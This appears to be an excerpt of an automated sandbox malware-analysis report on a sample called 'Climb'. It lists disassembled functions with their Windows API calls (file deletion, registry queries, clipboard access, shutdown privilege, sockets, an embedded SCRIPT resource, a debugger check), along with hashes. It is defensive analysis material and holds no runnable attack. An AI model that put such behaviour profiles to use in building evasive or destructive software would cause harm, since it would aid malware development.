RemoveDirectoryW.KERNEL32(?), ref: 00564813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0056489A
CloseHandle.KERNEL32(00000000), ref: 005648A5
CloseHandle.KERNEL32(00000000), ref: 005648B0

Strings

:, xrefs: 005647C7
\, xrefs: 005647BC
\??\%s, xrefs: 005647A0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 61f927f133052cc419f2d02a8b47d1089239a4aa03ff862c1195083c2e414c07
Instruction ID: 6594a06cda1b530340ad3c4014cf3285fa69dd0a38ee184170c8820d51a5719d
Opcode Fuzzy Hash: 61f927f133052cc419f2d02a8b47d1089239a4aa03ff862c1195083c2e414c07
Instruction Fuzzy Hash: 5331A37550014AABDB209BA0DC49FEB3BBCFF89740F1040B6F909E31A0EB7096459F64

Function 0056A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0056A203
FindNextFileW.KERNEL32(00000000,?), ref: 0056A25E
FindClose.KERNEL32(00000000), ref: 0056A269
FindFirstFileW.KERNEL32(*.*,?), ref: 0056A285
SetCurrentDirectoryW.KERNEL32(?), ref: 0056A2D5
SetCurrentDirectoryW.KERNEL32(005B7B94), ref: 0056A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 0056A2FD
FindClose.KERNEL32(00000000), ref: 0056A30A
FindClose.KERNEL32(00000000), ref: 0056A31A

Part of subcall function 0055E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0055E3B4

Strings

*.*, xrefs: 0056A280

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 5b892b94bdb99f0f23bf074540be65e4c475205eed70d97f6959da502818606a
Instruction ID: be8209aabe2663f4fb7dd918d83455d2dffc1c95420d5228365854393a427d65
Opcode Fuzzy Hash: 5b892b94bdb99f0f23bf074540be65e4c475205eed70d97f6959da502818606a
Instruction Fuzzy Hash: B831D03564021AAADB10AFA4DC49ADE7BEDBF85324F104591E811B31D0EB31DE898F61

Function 0057C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0057D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D451
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4C8
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0057CA09
RegCloseKey.ADVAPI32(00000000), ref: 0057CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0057CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0057CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0057CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0057CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0057CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0057CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0057CDE2
RegCloseKey.ADVAPI32(00000000), ref: 0057CDEF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 0eb9517eeebbd4b8aa964224a5a58ff2248958d8ac54798433bf470d4d360aeb
Instruction ID: dbfd87bdecaf9752bdb1d4f3a7d3977c871d4c730f98de6f655dcc0be0dda07d
Opcode Fuzzy Hash: 0eb9517eeebbd4b8aa964224a5a58ff2248958d8ac54798433bf470d4d360aeb
Instruction Fuzzy Hash: DB024A71604244AFC714DF24D895A2ABFE5FF89308F18C49DE849DB2A2DB31EC46DB51

Function 0055D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F55D1,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 004F5871

Part of subcall function 0055EAB0: GetFileAttributesW.KERNEL32(?,0055D840), ref: 0055EAB1

FindFirstFileW.KERNEL32(?,?), ref: 0055D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0055DA88
MoveFileW.KERNEL32(?,?), ref: 0055DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 0055DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 0055DAE2

Part of subcall function 0055DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0055DAC7,?,?), ref: 0055DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 0055DAFE
FindClose.KERNEL32(00000000), ref: 0055DB0F

Strings

\*.*, xrefs: 0055D978, 0055D981, 0055D996

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: b4100d6508546375f0a43b35a4f1560e844b61013883ba51fe206ccb243a1f6d
Instruction ID: ae6a10db8bcf605f9468e55a4088daf73b42f56218f048dc0b72e59845026861
Opcode Fuzzy Hash: b4100d6508546375f0a43b35a4f1560e844b61013883ba51fe206ccb243a1f6d
Instruction Fuzzy Hash: 96614B3280110DAECF15EBA1C9669FDBBB5BF15305F2040AAE902B7191DB356F0DCBA5

Function 0056F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0056F7EE
EmptyClipboard.USER32 ref: 0056F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 0056F809
CloseClipboard.USER32 ref: 0056F900

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: e7c099ffb0a3488964ecba294f85c8f09c28dfcf747cf213bf2b9976176e9d80
Instruction ID: e20a11870e22e1d833f4ac3feabed2b66f5207e60c5835efbeb69b47ed1e800a
Opcode Fuzzy Hash: e7c099ffb0a3488964ecba294f85c8f09c28dfcf747cf213bf2b9976176e9d80
Instruction Fuzzy Hash: A9419D35A04615AFE310CF16E888F257BE0FF54318F14C4ADE8198B6A2C735EC46DBA0

Function 0055F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00552010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0055205A
Part of subcall function 00552010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00552087
Part of subcall function 00552010: GetLastError.KERNEL32 ref: 00552097

ExitWindowsEx.USER32(?,00000000), ref: 0055F249

Strings

, xrefs: 0055F273
SeShutdownPrivilege, xrefs: 0055F219
@, xrefs: 0055F23C
, xrefs: 0055F237

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 8372c5820066c4f2ed72df6349c37157a18c8f8f370980c45d5130379a9d1f16
Instruction ID: c587285d4e0074433876f87e7adf9ec585cc6af5a8a5f73df5f4532c4f74830a
Opcode Fuzzy Hash: 8372c5820066c4f2ed72df6349c37157a18c8f8f370980c45d5130379a9d1f16
Instruction Fuzzy Hash: 6001DBBE6112156BEB1462B89CAAFBB7BACBB48346F150933FD03F21D1D5605D0C97A0

Function 004F22AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 004F233E
GetSysColor.USER32(0000000F), ref: 004F2421
SetBkColor.GDI32(?,00000000), ref: 004F2434

Strings

(\, xrefs: 004F240A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Color$Proc
String ID: (\
API String ID: 929743424-3685820393
Opcode ID: 3bf920135c900d77ea9e018140cdd9870982619cbad21a82a9c28cbc07e1bfb6
Instruction ID: 36c5d470872552e703763c68a96e09b1c6018e2ac4c9d40c403c4916ad694123
Opcode Fuzzy Hash: 3bf920135c900d77ea9e018140cdd9870982619cbad21a82a9c28cbc07e1bfb6
Instruction Fuzzy Hash: 6981B3F010540CBEE62966394EA9E7F2E5EFB82304F15010BFA02D6695C99D9F42927B

Function 00563A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,005356C2,?,?,00000000,00000000), ref: 00563A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005356C2,?,?,00000000,00000000), ref: 00563A35
LoadResource.KERNEL32(?,00000000,?,?,005356C2,?,?,00000000,00000000,?,?,?,?,?,?,004F66CE), ref: 00563A45
SizeofResource.KERNEL32(?,00000000,?,?,005356C2,?,?,00000000,00000000,?,?,?,?,?,?,004F66CE), ref: 00563A56
LockResource.KERNEL32(005356C2,?,?,005356C2,?,?,00000000,00000000,?,?,?,?,?,?,004F66CE,?), ref: 00563A65

Strings

SCRIPT, xrefs: 00563A2B

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 9ff2fda237c19aed9eaccd93882c4d0190ea1fb212dc13296aaf07140274aed5
Instruction ID: eda7bbd960fa147b4c5f97df5546fb371b1e62aa45e046788c5dccafd81c63b2
Opcode Fuzzy Hash: 9ff2fda237c19aed9eaccd93882c4d0190ea1fb212dc13296aaf07140274aed5
Instruction Fuzzy Hash: B9113575200705BFE7258BA5DC48F277BB9EFC5B51F24426DB842A72A0DB71E904EA30

Function 005520AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00551900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00551916
Part of subcall function 00551900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00551922
Part of subcall function 00551900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00551931
Part of subcall function 00551900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00551938
Part of subcall function 00551900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0055194E

GetLengthSid.ADVAPI32(?,00000000,00551C81), ref: 005520FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00552107
HeapAlloc.KERNEL32(00000000), ref: 0055210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00552127
GetProcessHeap.KERNEL32(00000000,00000000,00551C81), ref: 0055213B
HeapFree.KERNEL32(00000000), ref: 00552142

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 1744f8d71043b3647b9b7f2df38258af04bc147c30270d2b45dc0c66e85ee8a9
Instruction ID: eac7cfe7cf0164b2b5698739e35b4d43f347b5dc4c431d12841907b51da2739e
Opcode Fuzzy Hash: 1744f8d71043b3647b9b7f2df38258af04bc147c30270d2b45dc0c66e85ee8a9
Instruction Fuzzy Hash: FB11DC71901604EFDB149BA4CC28BAF7BB9FF62356F10401AED41A31A0D731A908DB60

Function 0056A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0056A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0056A6D0

Part of subcall function 005642B9: GetInputState.USER32 ref: 00564310
Part of subcall function 005642B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005643AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0056A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0056A6BA

Strings

*.*, xrefs: 0056A5A2

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: dd087837058a89b19e64bcf9ca7f5f5405a6571d64d722779a096d9b480ab9e9
Instruction ID: f31aec5523228346c919513484305beb2544a0af3fda73f76b2782cc0a076489
Opcode Fuzzy Hash: dd087837058a89b19e64bcf9ca7f5f5405a6571d64d722779a096d9b480ab9e9
Instruction Fuzzy Hash: 8E411A7190020A9BDB14EFA4C949AEEBBB4FF15314F14405AE906B3191EB31AE54DFA1

Function 00572263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00573AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00573AD7
Part of subcall function 00573AAB: _wcslen.LIBCMT ref: 00573AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 005722BA
WSAGetLastError.WSOCK32 ref: 005722E1
bind.WSOCK32(00000000,?,00000010), ref: 00572338
WSAGetLastError.WSOCK32 ref: 00572343
closesocket.WSOCK32(00000000), ref: 00572372

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 01b420ef4ad7869e248e31f056c841ba63ec3dd0edd0f8f50f054dd3eefcd281
Instruction ID: 4f50a167a95f7ad5be4cb81b43c919bc4764d35b150e89a31ecacc21e62e9da3
Opcode Fuzzy Hash: 01b420ef4ad7869e248e31f056c841ba63ec3dd0edd0f8f50f054dd3eefcd281
Instruction Fuzzy Hash: 3B51C075A00204AFEB10AF24C886F2A7BE5AB44718F44C48DF9499F3D3C774ED419BA1

Function 005826DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0058275C
IsWindowEnabled.USER32 ref: 0058276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00582777
IsIconic.USER32 ref: 00582785
IsZoomed.USER32 ref: 00582793

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 4311ebbf5f2e2be3cd94f51f5eb149a572953d5045ead0b595b7004e152af45a
Instruction ID: 2cfe18a36fbc917d4768e63b286758d8bbbf8f66ce114c8ce112ae81931eefc1
Opcode Fuzzy Hash: 4311ebbf5f2e2be3cd94f51f5eb149a572953d5045ead0b595b7004e152af45a
Instruction Fuzzy Hash: 6A219C317002159FE710AF27C844B2A7FE5FF94314F588069EC4AEB291D771E842CBA1

Function 0056D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0056D8CE
GetLastError.KERNEL32(?,00000000), ref: 0056D92F
SetEvent.KERNEL32(?,?,00000000), ref: 0056D943

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 561086dc648e5132d12027e2ebe4b5ed6de0b1b61f5b1bd6f31a66aa74fca520
Instruction ID: 76263cb700587207937a8d8f4f5f03d608027075a969e1dd4d5f0c0ee43acc89
Opcode Fuzzy Hash: 561086dc648e5132d12027e2ebe4b5ed6de0b1b61f5b1bd6f31a66aa74fca520
Instruction Fuzzy Hash: FF217F71A00705AFE7309F65D889BAABBFCFB51314F10481EE646A3191E770EA45DB70

Function 0055E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,005346AC), ref: 0055E482
GetFileAttributesW.KERNEL32(?), ref: 0055E491
FindFirstFileW.KERNEL32(?,?), ref: 0055E4A2
FindClose.KERNEL32(00000000), ref: 0055E4AE

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 2fa59f8e19ed9896686431f1b5364b8ddc0bf75050e7c073dfed51e9b1447993
Instruction ID: f47af29b9579e08bb3e6da59e27bacad3ab5b5db03a20c26dedd114b59715e79
Opcode Fuzzy Hash: 2fa59f8e19ed9896686431f1b5364b8ddc0bf75050e7c073dfed51e9b1447993
Instruction Fuzzy Hash: 81F0A03181091097DA146738AC0E8AA7BBDBE52336B504702FC37D20E0D7799E9DA6A5

Function 0054E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0054E5F8

Strings

%.3d, xrefs: 0054E603
X64, xrefs: 0054E680

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: f8a91a2938c4a91945cd4b757351b46fae467dd53d267b7cf92291e4bd0fb3dd
Instruction ID: 37a26889752d2fb8c2e53af7c952195f789fff19056996745e81c3b150c339c5
Opcode Fuzzy Hash: f8a91a2938c4a91945cd4b757351b46fae467dd53d267b7cf92291e4bd0fb3dd
Instruction Fuzzy Hash: F6D012B1C08108E6CBD09690AC4ACFD7BBCBB28344F254C56F906A1040E6209908A721

Function 00522992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00522A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00522A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00522AA1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
